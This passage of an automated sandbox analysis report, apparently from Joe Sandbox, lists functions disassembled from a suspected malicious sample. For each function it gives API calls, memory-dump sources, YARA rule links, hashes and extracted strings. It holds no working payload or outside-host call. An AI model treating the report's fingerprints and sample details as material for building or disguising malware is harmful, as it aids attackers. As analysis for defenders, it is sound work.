                                                                                                                            • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                                            • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                                                                            • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                                            • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                                                                            Function 004555B8 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4023252218-0
                                                                                                                            • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                            • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                                                                            • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                            • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                                                                            Function 0046032B Relevance: 7.5, APIs: 5, Instructions: 43windowtimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                                                                            • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                                                                            • MessageBeep.USER32(00000000), ref: 0046036D
                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                                                                            • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3741023627-0
                                                                                                                            • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                            • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                                                                            • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                            • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                                                                            Function 00455505 Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1489400265-0
                                                                                                                            • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                            • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                                                                            • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                            • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                                                                            Function 0045551F Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1042038666-0
                                                                                                                            • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                            • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                                                                            • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                            • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                                                                            Function 0043315E Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2625713937-0
                                                                                                                            • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                            • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                                                                            • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                            • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                                                                            Function 004140CF Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                                            • ExitThread.KERNEL32 ref: 0041410F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                                            • __freefls@4.LIBCMT ref: 00414135
                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 132634196-0
                                                                                                                            • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                                            • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                                                                                            • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                                            • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                                                                                            Function 00415601 Relevance: 7.5, APIs: 5, Instructions: 23threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                                                                              • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                                            • __getptd_noexit.LIBCMT ref: 00415620
                                                                                                                            • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                                                                                                                            • __freeptd.LIBCMT ref: 0041563B
                                                                                                                            • ExitThread.KERNEL32 ref: 00415643
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3798957060-0
                                                                                                                            • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                            • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                                                                            • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                            • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                                                                                            Function 0041567F Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                            • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                            • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1537469427-0
                                                                                                                            • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                            • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                                                                                            • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                            • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                                                                                            Function 0040AB16 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 423COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc
                                                                                                                            • String ID: Default$|k
                                                                                                                            • API String ID: 1579825452-2254895183
                                                                                                                            • Opcode ID: fb2f27172e282b4819a4f10bf0192d96dd614055304b8ac60cfd395dc02fa5f1
                                                                                                                            • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                                                                                                            • Opcode Fuzzy Hash: fb2f27172e282b4819a4f10bf0192d96dd614055304b8ac60cfd395dc02fa5f1
                                                                                                                            • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                                                                                                            Function 0044F0B1 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 377COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memcmp
                                                                                                                            • String ID: '$[$h
                                                                                                                            • API String ID: 2931989736-1224472061
                                                                                                                            • Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                                            • Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
                                                                                                                            • Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                                            • Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
                                                                                                                            Function 0044F1F5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 358COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncmp
                                                                                                                            • String ID: >$R$U
                                                                                                                            • API String ID: 909875538-1924298640
                                                                                                                            • Opcode ID: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                                                                            • Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
                                                                                                                            • Opcode Fuzzy Hash: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                                                                            • Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
                                                                                                                            Function 0046CDA0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                                                                            • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                                                                            • CoUninitialize.OLE32 ref: 0046CE50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                            • String ID: .lnk
                                                                                                                            • API String ID: 886957087-24824748
                                                                                                                            • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                            • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                                                                            • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                            • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                                                                            Function 00469BED Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcslen
                                                                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                            • API String ID: 176396367-557222456
                                                                                                                            • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                                            • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                                                                            • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                                            • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                                                                            Function 0042D2CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 204COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearCopyInit_malloc
                                                                                                                            • String ID: 4RH
                                                                                                                            • API String ID: 2981388473-749298218
